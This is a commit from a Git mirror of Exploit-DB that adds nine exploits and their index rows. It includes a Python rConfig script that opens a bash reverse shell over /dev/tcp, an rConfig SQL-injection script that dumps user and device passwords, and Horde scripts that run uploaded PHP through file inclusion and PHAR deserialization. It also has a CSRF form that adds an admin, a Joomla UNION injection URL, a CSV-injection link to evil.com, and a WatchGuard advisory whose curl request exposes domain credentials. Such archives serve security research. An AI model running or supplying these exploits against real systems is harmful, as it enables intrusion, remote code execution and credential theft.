bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-03-13

Browse source 
9 changes to exploits/shellcodes

ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path
Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection
WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure
Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection
HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)
rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution
rConfig 3.9 - 'searchColumn' SQL Injection
Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion
Horde Groupware Webmail Edition 5.2.22 - PHAR Loading
This commit is contained in:
Offensive Security 2020-03-13 05:01:50 +00:00
parent 3c74040d79
commit 153c392dd9
10 changed files with 880 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

168
exploits/java/webapps/48203.txt Normal file
View file

@ -0,0 +1,168 @@
# Exploit: WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure
# Author: RedTeam Pentesting GmbH
# Date: 2020-03-11
# Vendor: https://www.watchguard.com
# Software link: https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
# CVE: N/A
Advisory: Credential Disclosure in WatchGuard Fireware AD Helper Component
RedTeam Pentesting discovered a credential-disclosure vulnerability in
the AD Helper component of the WatchGuard Fireware Threat Detection and
Response (TDR) service, which allows unauthenticated attackers to gain
Active Directory credentials for a Windows domain in plaintext.
Details
=======
Product: WatchGuard Fireware AD Helper Component
Affected Versions: 5.8.5.10233, < 5.8.5.10317
Fixed Versions: 5.8.5.10317
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-001
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
Introduction
============
"Threat Detection and Response (TDR) is a cloud-based subscription
service that integrates with your Firebox to minimize the consequences
of data breaches and penetrations through early detection and automated
remediation of security threats."
"Threat Detection and Response includes the AD Helper component. If your
network has an Active Directory server, you can install AD Helper to
manage automated installation and updates of Host Sensors on your
network."
(from the vendor's homepage)
More Details
============
By accessing the AD Helper's web interface, it was discovered that a
call to an API endpoint is made, which responds with plaintext
credentials to all configured domain controllers. There is no
authentication needed to use the described interface and the
installation instructions at [1] contain no indication of any way to
configure access control.
Proof of Concept
================
An HTTP GET request to the path "/domains/list" of the AD Helper
API returns, among others, the plaintext credentials to
all configured Windows domain controllers:
------------------------------------------------------------------------
$ curl --silent "http://adhelper.example.com:8080/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc" | jq .
{
"content": [
{
"id": 1,
"fullyQualifiedName": "example.com",
"logonDomain": "example.com",
"domainControllers": "dc1.example.com",
"username": "[DOMAIN_USER]",
"password": "[DOMAIN_PASSWORD]",
"uuid": "[...]",
"servers": [
{
[...]
}
]
}
],
"totalPages": 1,
"totalElements": 1,
"number": 0,
"numberOfElements": 1
}
------------------------------------------------------------------------
The same request and its response can be observed when initially accessing
the web interface. The discovered version of AD Helper responds with
the following server banner:
------------------------------------------------------------------------
jetty(winstone-5.8.5.10233-9.4.12.v20180830)
------------------------------------------------------------------------
It is likely that other versions of the AD Helper Component are
vulnerable as well.
Workaround
==========
Ensure API of the AD Helper Component is not reachable over the network,
for example by putting it behind a Firewall.
Fix
===
Update to Version 5.8.5.10317 or later.
Security Risk
=============
No authentication is needed to access AD Helper's web interface and the
installation instructions at [1] describe that configured domain user
accounts must possess at least the following privileges:
* Connect to the host
* Mount the share ADMIN$
* Create a file on the host
* Execute commands on the host
* Install software on the host
Access to the "ADMIN$" share implies a user with administrative
privileges. Therefore, this vulnerability poses a high risk.
Timeline
========
2020-02-12 Vulnerability identified
2020-02-19 Customer approved disclosure to vendor
2020-02-24 Tried to contact the German branch of WatchGuard
2020-02-27 Contacted the Dutch branch of WatchGuard
2020-02-28 Contact to ADHelper QA Team Lead established
2020-03-02 Advisory draft sent for verification
2020-03-10 Vendor released fixed version and blog post
2020-03-11 CVE ID requested
2020-03-11 Advisory released
References
==========
[1] https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/

16
exploits/php/webapps/48202.txt Normal file
View file

@ -0,0 +1,16 @@
# Exploit Title: Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection
# Date: 2020-03-10
# Author: Milad Karimi
# Software Link:
# Version:
# Category : webapps
# Tested on: windows 10 , firefox
# CVE : CWE-89
# Dork: inurl:index.php?option=com_newsfeeds
index.php?option=com_newsfeeds&view=categories&feedid=[sqli]
Example:
http://[site]/index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--

38
exploits/php/webapps/48204.txt Normal file
View file

@ -0,0 +1,38 @@
# Exploit Title: Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection
# Google Dork: N/A
# Date: 2020-03-05
# Exploit Author: Daniel Monzón (stark0de)
# Vendor Homepage: https://www.codepeople.net/
# Software Link: https://downloads.wordpress.org/plugin/appointment-booking-calendar.zip
# Version: 1.3.34
# Tested on: Windows 7 x86 SP1
# CVE : CVE-2020-9371, CVE-2020-9372
----Stored Cross-Site-Scripting-------------------
1) In http://127.0.0.1/wordpress/wp-admin/admin.php?page=cpabc_appointments.php
2) Calendar Name=<script>alert(0)</script> and Update
3) Click in any of the other tabs
----CSV injection---------------------------------
1) First we create a new calendar (Pages, add new, booking calendar) and Publish it (we can now log out)
2) Then we go to the page and introduce data, and the payload:
New booking:
Name: IMPORTANT DATA
Description: http://evil.com/evil.php
New booking:
Name: test
Description: =HYPERLINK(K2;H2)
This is the way it would work if i had a business registered and the payment was completed it can also be done by adding the new bookings with the same data from the admin panel
3) Then we go to Bookings List and export the CSV file
4) After that we open the file, and import data from an external file, using comma as separator
5) Hyperlink to malicious PHP file is inserted and the user clicks on it, user is redirected to a fake login page (for example)
Tested on Windows 7 Pro SP1 32-bit, Wordpress 5.3.2 and Excel 2016

51
exploits/php/webapps/48205.txt Normal file
View file

@ -0,0 +1,51 @@
# Exploit Title: HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)
# Date: 2020-03-11
# Exploit Author: Ismail Akıcı
# Vendor Homepage: http://hrsale.com/
# Software Link : http://demo.hrsale.com/
# Software : HRSALE v1.1.8
# Product Version: v1.1.8
# Vulnerability Type : Cross-Site Request Forgery (Add Admin)
# Vulnerability : Cross-Site Request Forgery
# Description :
# CSRF vulnerability was discovered in v1.1.8 version of HRSALE.
# With this vulnerability, authorized users can be added to the system.
HTML CSRF PoC :
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://demo.hrsale.com/admin/employees/add_employee" method="POST" enctype="multipart/form-data">
<input type="hidden" name="&#95;user" value="1" />
<input type="hidden" name="csrf&#95;hrsale" value="e8ed76f1f2110f7244b58062e2209961" />
<input type="hidden" name="first&#95;name" value="Ismail" />
<input type="hidden" name="last&#95;name" value="Akici" />
<input type="hidden" name="company&#95;id" value="1" />
<input type="hidden" name="location&#95;id" value="1" />
<input type="hidden" name="username" value="ismailtakici" />
<input type="hidden" name="email" value="ismail&#46;akici&#64;gmail&#46;com" />
<input type="hidden" name="date&#95;of&#95;birth" value="2020&#45;03&#45;11" />
<input type="hidden" name="contact&#95;no" value="5554443322" />
<input type="hidden" name="employee&#95;id" value="1" />
<input type="hidden" name="date&#95;of&#95;joining" value="2020&#45;03&#45;11" />
<input type="hidden" name="department&#95;id" value="1" />
<input type="hidden" name="subdepartment&#95;id" value="YES" />
<input type="hidden" name="designation&#95;id" value="9" />
<input type="hidden" name="gender" value="Male" />
<input type="hidden" name="office&#95;shift&#95;id" value="1" />
<input type="hidden" name="password" value="Test1234&#33;" />
<input type="hidden" name="confirm&#95;password" value="Test1234&#33;" />
<input type="hidden" name="role" value="1" />
<input type="hidden" name="leave&#95;categories&#91;&#93;" value="0" />
<input type="hidden" name="leave&#95;categories&#91;&#93;" value="1" />
<input type="hidden" name="address" value="Test&#32;Address" />
<input type="hidden" name="is&#95;ajax" value="1" />
<input type="hidden" name="add&#95;type" value="employee" />
<input type="hidden" name="form" value="add&#95;employee" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

50
exploits/php/webapps/48207.py Executable file
View file

@ -0,0 +1,50 @@
# Exploit Title: rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution
# Date: 2020-03-08
# Exploit Author: Engin Demirbilek
# Vendor Homepage: https://www.rconfig.com/
# Version: rConfig <= 3.94
# Tested on: centOS
# CVE: CVE-2020-10221
# Advisory link: https://engindemirbilek.github.io/rconfig-3.93-rce
import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
if len(sys.argv) < 6:
print "Usage: ./exploit.py http(s)://url username password listenerIP listenerPort"
exit()
url = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
payload = ";bash -i >& /dev/tcp/{}/{} 0>&1;".format(sys.argv[4], sys.argv[5])
login = {
'user':user,
'pass':password,
'sublogin':'1'
}
req = requests.Session()
print "Sendin login request ..."
login = req.post(url+"/lib/crud/userprocess.php", data=login, verify=False)
payload = {
'fileName':payload,
}
print "[+] Sendin exploit ..."
exploit = req.post(url+"/lib/ajaxHandlers/ajaxAddTemplate.php",cookies=req.cookies, data=payload, headers={
'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Encoding':'gzip, deflate',
'Content-Type':'application/x-www-form-urlencoded'},verify=False)
if exploit.status_code == 200:
print "[+] Everything seems ok, check your listener."
else:
print "[-] Exploit failed, system is patched or credentials are wrong."

107
exploits/php/webapps/48208.py Executable file
View file

@ -0,0 +1,107 @@
# Exploit Title: rConfig 3.9 - 'searchColumn' SQL Injection
# Exploit Author: vikingfr
# Date: 2020-03-03
# CVE-2020-10220
# Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py
# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)
# Software Link : https://www.rconfig.com/downloads/rconfig-3.9.4.zip
# Install scripts :
# https://www.rconfig.com/downloads/scripts/install_rConfig.sh
# https://www.rconfig.com/downloads/scripts/centos7_install.sh
# https://www.rconfig.com/downloads/scripts/centos6_install.sh
# Version: tested v3.9.4
# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24
#
# Notes : If you want to reproduce in your lab environment follow those links :
# http://help.rconfig.com/gettingstarted/installation
# then
# http://help.rconfig.com/gettingstarted/postinstall
#
# $ python3 rconfig_sqli.py https://1.1.1.1
# rconfig 3.9 - SQL Injection PoC
# [+] Triggering the payloads on https://1.1.1.1/commands.inc.php
# [+] Extracting the current DB name :
# rconfig2
# [+] Extracting 10 first users :
# admin:1:63a9f0ea7bb98050796b649e85481845
# Maybe no more information ?
# Maybe no more information ?
# [snip]
# [+] Extracting 10 first devices :
# 127-0-0-1:127.0.0.1::ocdvulnpass:
# deviceTestName:1.1.1.1:myusertest:mysecret:myenablesecret
# Maybe no more information ?
# Maybe no more information ?
# [snip]
# Done
#!/usr/bin/python3
import requests
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
print ("rconfig 3.9 - SQL Injection PoC")
if len(sys.argv) != 2:
print ("[+] Usage : ./rconfig_exploit.py https://target")
exit()
vuln_page="/commands.inc.php"
vuln_parameters="?searchOption=contains&searchField=vuln&search=search&searchColumn=command"
given_target = sys.argv[1]
target = given_target
target += vuln_page
target += vuln_parameters
request = requests.session()
dashboard_request = request.get(target+vuln_page, allow_redirects=False, verify=False)
def extractDBinfos(myTarget=None,myPayload=None):
"""
Extract information from database
Args:
- target+payload (String)
Returns:
- payload result (String)
"""
result = ""
encoded_request = myTarget+myPayload
exploit_req = request.get(encoded_request)
if '[PWN]' in str(exploit_req.content):
result = str(exploit_req.content).split('[PWN]')[1]
else:
result="Maybe no more information ?"
return result
if dashboard_request.status_code != 404:
print ("[+] Triggering the payloads on "+given_target+vuln_page)
# get the db name
print ("[+] Extracting the current DB name :")
db_payload = "%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,database(),0x5B50574E5D3C42523E)%20limit%200,1),NULL--"
db_name = extractDBinfos(target,db_payload)
print (db_name)
# DB extract users
print ("[+] Extracting 10 first users :")
for i in range (0, 10):
user1_payload="%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,username,0x3A,id,0x3A,password,0x5B50574E5D3C42523E)%20FROM%20"+db_name+".users+limit+"+str(i)+","+str(i+1)+"),NULL--"
user_h = extractDBinfos(target,user1_payload)
#print ("[+] Dump device "+str(i))
print (user_h)
# DB extract devices information
print ("[+] Extracting 10 first devices :")
for i in range (0, 10):
device_payload="%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,deviceName,0x3A,deviceIpAddr,0x3A,deviceUsername,0x3A,devicePassword,0x3A,deviceEnablePassword,0x5B50574E5D3C42523E)%20FROM%20"+db_name+".nodes+limit+"+str(i)+","+str(i+1)+"),NULL--"
device_h = extractDBinfos(target,device_payload)
#print ("[+] Dump device "+str(i))
print (device_h)
print ("Done")
else:
print ("[-] Please verify the URI")
exit()

166
exploits/php/webapps/48209.py Executable file
View file

@ -0,0 +1,166 @@
## exploit-inc-inclusion.py
#!/usr/bin/env python3
from horde import Horde
import subprocess
import sys
TEMP_DIR = '/tmp'
if len(sys.argv) < 5:
print('Usage: <base_url> <username> <password> <filename> <php_code>')
sys.exit(1)
base_url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
filename = sys.argv[4]
php_code = sys.argv[5]
# log into the web application
horde = Horde(base_url, username, password)
# upload (delete manually) and evaluate the .inc file
horde.upload_to_tmp('{}.inc'.format(filename), '<?php {} die();'.format(php_code))
horde.include_remote_inc_file('{}/{}'.format(TEMP_DIR, filename))
## exploit-inc-inclusion.py EOF
## horde.py
import re
import requests
class Horde():
def __init__(self, base_url, username, password):
self.base_url = base_url
self.username = username
self.password = password
self.session = requests.session()
self.token = None
self._login()
def _login(self):
url = '{}/login.php'.format(self.base_url)
data = {
'login_post': 1,
'horde_user': self.username,
'horde_pass': self.password
}
response = self.session.post(url, data=data)
token_match = re.search(r'"TOKEN":"([^"]+)"', response.text)
assert (
len(response.history) == 1 and
response.history[0].status_code == 302 and
response.history[0].headers['location'] == '/services/portal/' and
token_match
), 'Cannot log in'
self.token = token_match.group(1)
def upload_to_tmp(self, filename, data):
url = '{}/turba/add.php'.format(self.base_url)
files = {
'object[photo][img][file]': (None, filename),
'object[photo][new]': ('x', data)
}
response = self.session.post(url, files=files)
assert response.status_code == 200, 'Cannot upload the file to tmp'
def include_remote_inc_file(self, path):
# vulnerable block (alternatively 'trean:trean_Block_Mostclicked')
app = 'trean:trean_Block_Bookmarks'
# add one dummy bookmark (to be sure)
url = '{}/trean/add.php'.format(self.base_url)
data = {
'actionID': 'add_bookmark',
'url': 'x'
}
response = self.session.post(url, data=data)
assert response.status_code == 200, 'Cannot add the bookmark'
# add bookmark block
url = '{}/services/portal/edit.php'.format(self.base_url)
data = {
'token': self.token,
'row': 0,
'col': 0,
'action': 'save-resume',
'app': app,
}
response = self.session.post(url, data=data)
assert response.status_code == 200, 'Cannot add the bookmark block'
# edit bookmark block
url = '{}/services/portal/edit.php'.format(self.base_url)
data = {
'token': self.token,
'row': 0,
'col': 0,
'action': 'save',
'app': app,
'params[template]': '../../../../../../../../../../../' + path
}
response = self.session.post(url, data=data)
assert response.status_code == 200, 'Cannot edit the bookmark block'
# evaluate the remote file
url = '{}/services/portal/'.format(self.base_url)
response = self.session.get(url)
print(response.text)
# remove the bookmark block so to not break the page
url = '{}/services/portal/edit.php'.format(self.base_url)
data = {
# XXX token not needed here
'row': 0,
'col': 0,
'action': 'removeBlock'
}
response = self.session.post(url, data=data)
assert response.status_code == 200, 'Cannot reset the bookmark block'
def trigger_phar(self, path):
# vulnerable block (alternatively the same can be obtained by creating a
# bookmark with the PHAR path and clocking on it)
app = 'horde:horde_Block_Feed'
# add syndicated feed block
url = '{}/services/portal/edit.php'.format(self.base_url)
data = {
'token': self.token,
'row': 0,
'col': 0,
'action': 'save-resume',
'app': app,
}
response = self.session.post(url, data=data)
assert response.status_code == 200, 'Cannot add the syndicated feed block'
# edit syndicated feed block
url = '{}/services/portal/edit.php'.format(self.base_url)
data = {
'token': self.token,
'row': 0,
'col': 0,
'action': 'save',
'app': app,
'params[uri]': 'phar://{}'.format(path)
}
response = self.session.post(url, data=data)
assert response.status_code == 200, 'Cannot edit the syndicated feed block'
# load the PHAR archive
url = '{}/services/portal/'.format(self.base_url)
response = self.session.get(url)
# remove the syndicated feed block so to not break the page
url = '{}/services/portal/edit.php'.format(self.base_url)
data = {
# XXX token not needed here
'row': 0,
'col': 0,
'action': 'removeBlock'
}
response = self.session.post(url, data=data)
assert response.status_code == 200, 'Cannot reset the syndicated feed block'
## horde.py EOF

241
exploits/php/webapps/48210.py Executable file
View file

@ -0,0 +1,241 @@
## exploit-phar-loading.py
#!/usr/bin/env python3
from horde import Horde
import requests
import subprocess
import sys
TEMP_DIR = '/tmp'
WWW_ROOT = '/var/www/html'
if len(sys.argv) < 5:
print('Usage: <base_url> <username> <password> <filename> <php_code>')
sys.exit(1)
base_url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
filename = sys.argv[4]
php_code = sys.argv[5]
source = '{}/{}.phar'.format(TEMP_DIR, filename)
destination = '{}/static/{}.php'.format(WWW_ROOT, filename) # destination (delete manually)
temp = 'temp.phar'
url = '{}/static/{}.php'.format(base_url, filename)
# log into the web application
horde = Horde(base_url, username, password)
# create a PHAR that performs a rename when loaded and runs the payload when executed
subprocess.run([
'php', 'create-renaming-phar.php',
temp, source, destination, php_code
], stderr=subprocess.DEVNULL)
# upload the PHAR
with open(temp, 'rb') as fs:
phar_data = fs.read()
horde.upload_to_tmp('{}.phar'.format(filename), phar_data)
# load the phar thus triggering the rename
horde.trigger_phar(source)
# issue a request to trigger the payload
response = requests.get(url)
print(response.text)
## exploit-phar-loading.py EOF
## create-renaming-phar.php
#!/usr/bin/env php
<?php
// the __destruct method of Horde_Auth_Passwd eventually calls
// rename($this->_lockfile, $this->_params['filename']) if $this->_locked
class Horde_Auth_Passwd {
// visibility must match since protected members are prefixed by "\x00*\x00"
protected $_locked;
protected $_params;
function __construct($source, $destination) {
$this->_params = array('filename' => $destination);
$this->_locked = true;
$this->_lockfile = $source;
}
};
function createPhar($path, $source, $destination, $stub) {
// create the object and specify source and destination files
$object = new Horde_Auth_Passwd($source, $destination);
// create the PHAR
$phar = new Phar($path);
$phar->startBuffering();
$phar->addFromString('x', '');
$phar->setStub("<?php $stub __HALT_COMPILER();");
$phar->setMetadata($object);
$phar->stopBuffering();
}
function main() {
global $argc, $argv;
// check arguments
if ($argc != 5) {
fwrite(STDERR, "Usage: <path> <source> <destination> <stub>\n");
exit(1);
}
// create a fresh new phar
$path = $argv[1];
$source = $argv[2];
$destination = $argv[3];
$stub = $argv[4];
@unlink($path);
createPhar($path, $source, $destination, $stub);
}
main();
## create-renaming-phar.php EOF
## horde.py
import re
import requests
class Horde():
def __init__(self, base_url, username, password):
self.base_url = base_url
self.username = username
self.password = password
self.session = requests.session()
self.token = None
self._login()
def _login(self):
url = '{}/login.php'.format(self.base_url)
data = {
'login_post': 1,
'horde_user': self.username,
'horde_pass': self.password
}
response = self.session.post(url, data=data)
token_match = re.search(r'"TOKEN":"([^"]+)"', response.text)
assert (
len(response.history) == 1 and
response.history[0].status_code == 302 and
response.history[0].headers['location'] == '/services/portal/' and
token_match
), 'Cannot log in'
self.token = token_match.group(1)
def upload_to_tmp(self, filename, data):
url = '{}/turba/add.php'.format(self.base_url)
files = {
'object[photo][img][file]': (None, filename),
'object[photo][new]': ('x', data)
}
response = self.session.post(url, files=files)
assert response.status_code == 200, 'Cannot upload the file to tmp'
def include_remote_inc_file(self, path):
# vulnerable block (alternatively 'trean:trean_Block_Mostclicked')
app = 'trean:trean_Block_Bookmarks'
# add one dummy bookmark (to be sure)
url = '{}/trean/add.php'.format(self.base_url)
data = {
'actionID': 'add_bookmark',
'url': 'x'
}
response = self.session.post(url, data=data)
assert response.status_code == 200, 'Cannot add the bookmark'
# add bookmark block
url = '{}/services/portal/edit.php'.format(self.base_url)
data = {
'token': self.token,
'row': 0,
'col': 0,
'action': 'save-resume',
'app': app,
}
response = self.session.post(url, data=data)
assert response.status_code == 200, 'Cannot add the bookmark block'
# edit bookmark block
url = '{}/services/portal/edit.php'.format(self.base_url)
data = {
'token': self.token,
'row': 0,
'col': 0,
'action': 'save',
'app': app,
'params[template]': '../../../../../../../../../../../' + path
}
response = self.session.post(url, data=data)
assert response.status_code == 200, 'Cannot edit the bookmark block'
# evaluate the remote file
url = '{}/services/portal/'.format(self.base_url)
response = self.session.get(url)
print(response.text)
# remove the bookmark block so to not break the page
url = '{}/services/portal/edit.php'.format(self.base_url)
data = {
# XXX token not needed here
'row': 0,
'col': 0,
'action': 'removeBlock'
}
response = self.session.post(url, data=data)
assert response.status_code == 200, 'Cannot reset the bookmark block'
def trigger_phar(self, path):
# vulnerable block (alternatively the same can be obtained by creating a
# bookmark with the PHAR path and clocking on it)
app = 'horde:horde_Block_Feed'
# add syndicated feed block
url = '{}/services/portal/edit.php'.format(self.base_url)
data = {
'token': self.token,
'row': 0,
'col': 0,
'action': 'save-resume',
'app': app,
}
response = self.session.post(url, data=data)
assert response.status_code == 200, 'Cannot add the syndicated feed block'
# edit syndicated feed block
url = '{}/services/portal/edit.php'.format(self.base_url)
data = {
'token': self.token,
'row': 0,
'col': 0,
'action': 'save',
'app': app,
'params[uri]': 'phar://{}'.format(path)
}
response = self.session.post(url, data=data)
assert response.status_code == 200, 'Cannot edit the syndicated feed block'
# load the PHAR archive
url = '{}/services/portal/'.format(self.base_url)
response = self.session.get(url)
# remove the syndicated feed block so to not break the page
url = '{}/services/portal/edit.php'.format(self.base_url)
data = {
# XXX token not needed here
'row': 0,
'col': 0,
'action': 'removeBlock'
}
response = self.session.post(url, data=data)
assert response.status_code == 200, 'Cannot reset the syndicated feed block'
## horde.py EOF

34
exploits/windows/local/48206.txt Normal file
View file

@ -0,0 +1,34 @@
# Exploit Title: ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path
# Discovery by: Roberto Piña
# Discovery Date: 2020-03-11
# Vendor Homepage: https://www.asus.com/
# Software Link :https://dlcdnets.asus.com/pub/ASUS/misc/utils/AISuite3_Win10_H97M-Pro_V10102.zip?_ga=2.170180192.1334401606.1583873755-790266082.1583873755
# Tested Version: 1.00.22
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Home x64 en
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "asHmComSvc" | findstr /i /v """
ASUS HM Com Service asHmComSvc C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe Auto
C:\>sc qc asHmComSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: asHmComSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ASUS HM Com Service
DEPENDENCIES : RpcSs
SERVICE_START_NAME : LocalSystem
#Exploit:
# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user's code would execute with the elevated
# privileges of the application.

9
files_exploits.csv
View file

@ -10988,6 +10988,7 @@ id,file,description,date,author,type,platform,port
48185,exploits/linux/local/48185.rb,"OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit)",2020-03-09,Metasploit,local,linux,
48187,exploits/multiple/local/48187.txt,"Counter Strike: GO - '.bsp' Memory Control (PoC)",2020-03-09,"0day enthusiast",local,multiple,
48193,exploits/windows/local/48193.txt,"ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path",2020-03-11,"Roberto Piña",local,windows,
48206,exploits/windows/local/48206.txt,"ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path",2020-03-12,"Roberto Piña",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -42457,3 +42458,11 @@ id,file,description,date,author,type,platform,port
48189,exploits/php/webapps/48189.txt,"YzmCMS 5.5 - 'url' Persistent Cross-Site Scripting",2020-03-10,En_dust,webapps,php,
48190,exploits/php/webapps/48190.txt,"Persian VIP Download Script 1.0 - 'active' SQL Injection",2020-03-10,S3FFR,webapps,php,
48197,exploits/php/webapps/48197.txt,"Wordpress Plugin Search Meter 2.13.2 - CSV injection",2020-03-11,"Daniel Monzón",webapps,php,
48202,exploits/php/webapps/48202.txt,"Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection",2020-03-12,"Milad karimi",webapps,php,
48203,exploits/java/webapps/48203.txt,"WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure",2020-03-12,"RedTeam Pentesting GmbH",webapps,java,
48204,exploits/php/webapps/48204.txt,"Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection",2020-03-12,"Daniel Monzón",webapps,php,
48205,exploits/php/webapps/48205.txt,"HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)",2020-03-12,"Ismail Akıcı",webapps,php,
48207,exploits/php/webapps/48207.py,"rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution",2020-03-12,"Engin Demirbilek",webapps,php,
48208,exploits/php/webapps/48208.py,"rConfig 3.9 - 'searchColumn' SQL Injection",2020-03-12,vikingfr,webapps,php,
48209,exploits/php/webapps/48209.py,"Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion",2020-03-11,"Andrea Cardaci",webapps,php,
48210,exploits/php/webapps/48210.py,"Horde Groupware Webmail Edition 5.2.22 - PHAR Loading",2020-03-11,"Andrea Cardaci",webapps,php,

Can't render this file because it is too large.